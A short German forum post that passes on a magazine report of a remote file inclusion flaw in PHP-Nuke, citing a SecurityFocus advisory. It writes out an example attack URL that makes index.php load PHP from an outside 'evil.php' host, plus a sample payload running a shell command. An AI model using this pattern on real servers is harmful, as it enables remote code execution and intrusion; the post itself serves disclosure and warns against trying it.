Hi,
FYI:
In der Ausgabe 4 vom Linux-Magazin befindet sich auf Seite 24 ein Bericht, der ein massives Sicherheitsleck von PHP-Nuke aufdeckt. Kurz nachberichtet:
Mit dem URL-Parameter "file" kann man der index.php sagen, dass eine bestimmte Datei eingebunden werden soll. Gibt man hier statt dessen eine URL an, deren Ressource (ungeparsten) PHP-Code beinhaltet, wird dieser ausgeführt; beispielsweise:
http://server-mit-php-nuke/index.php?file=http://eigener-server/evil.php
Diese Ressource kann dann Code der Art
<?php system('ls -al') ?>
beinhalten - ich möchte alle Leser eindringlich bitten, es niemals mit etwas ernsterem auszuprobieren!
Angegebener Link: http://online.securityfocus.com/bid/3889
Das obligatorische "ich hab's ja immer gesagt" und das Geplänkel über Sinn und vor allem Unsinn diverser PHP-Funktionen spare ich mir ;-)
Cheatah
P.S.: Ich selbst hab's nicht getestet.